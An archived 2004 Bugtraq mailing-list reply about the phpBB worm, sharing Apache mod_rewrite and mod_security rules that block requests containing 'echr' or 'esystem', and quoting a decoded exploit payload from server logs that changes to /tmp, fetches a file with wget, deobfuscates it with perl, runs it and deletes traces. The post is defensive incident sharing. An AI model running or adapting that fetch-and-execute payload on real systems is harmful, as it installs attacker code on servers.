[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: phpBB Worm
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: phpBB Worm
- From: Sebastian Wiesinger <bofh@xxxxxxxxxxxxx>
- Date: Wed, 22 Dec 2004 12:22:15 +0100
* Raymond Dijkxhoorn <raymond@xxxxxxxxxxxxxxx> [2004-12-22 00:06]:
> If you cannot fix it (virtual servers) fast for all your clients you could
> also try with something like this:
> RewriteEngine On
> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
> RewriteRule ^.*$ - [F]
> We had some vhosts where this worked just fine. On our systems we didnt
> see any valid request with echr and esystem, just be gentle with it, it
> works for me, it could work for you ;)
If you use mod_security, this may help, too:
SecFilterSelective "THE_REQUEST"
I had another exploit attempt, with this payload: - - [22/Dec/2004:10:06:47 +0100] "GET
HTTP/1.1" 200 12266 "-" "-"
Which decodes to:
rush=echo _START_; cd /tmp;wget -O .b; perl -pe
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*;
echo _END_
GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
Wehret den Anfaengen: http://odem.org/informationsfreiheit/
Thunder rolled. ... It rolled a six.
--Terry Pratchett, Guards! Guards!